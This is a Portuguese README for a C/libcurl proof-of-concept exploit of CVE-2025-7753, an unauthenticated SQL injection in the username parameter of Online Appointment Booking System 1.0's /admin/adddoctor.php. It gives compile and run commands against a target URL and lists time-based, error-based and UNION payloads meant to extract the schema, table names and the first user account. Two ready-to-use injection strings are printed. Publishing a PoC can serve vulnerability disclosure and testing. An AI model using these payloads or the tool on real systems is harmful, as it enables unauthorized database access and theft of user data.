
Exploit PoC para CVE-2025-7753 — Injeção SQL Baseada em Tempo no Online Appointment Booking System 1.0 por meio do parâmetro username. Exploit escrito em C usando libcurl.
Autor: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE‑2025‑7753
Vulnerabilidade: Injeção SQL não autenticada, baseada em tempo
Existe uma vulnerabilidade crítica de Injeção SQL no Sistema de Agendamento de Consultas Online 1.0 (Code‑Projects) no arquivo
/admin/adddoctor.php. O parâmetro username não é devidamente sanitizado, permitindo que atacantes remotos executem consultas SQL arbitrárias (baseadas em tempo, erro, UNION e booleano).
Este repositório fornece o primeiro PoC público escrito em C, utilizando libcurl para requisições HTTP e saída colorida ANSI para clareza.
Sistema Operacional: Linux (x86_64 recomendado)
Compilador: GCC ou Clang
Dependências:
sudo apt update sudo apt install build-essential libcurl4-openssl-dev
🚀 Compilar & Executar
Compilar:
gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
Executar (como root):
sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/
Modo verboso (opcional):
sudo ./CODE_PROJECT -u http://TARGET/... -v
📜 Fluxo de Trabalho do Exploit
Verificações de ambiente garantem que você está no Linux e executando como root (escala automaticamente via sudo se necessário).
O array de payloads inclui:
Baseado em tempo (SLEEP(5))
Baseado em erro (RLIKE, CONCAT, COUNT)
Consultas baseadas em UNION para extrair esquema, usuário, nomes de tabelas e a primeira conta de usuário.
libcurl realiza requisições POST e captura as respostas do servidor.
A análise da resposta procura por strings de erro SQL para confirmar a vulnerabilidade.
🧪 Payloads Testados
11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz 11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm … etc.
MIT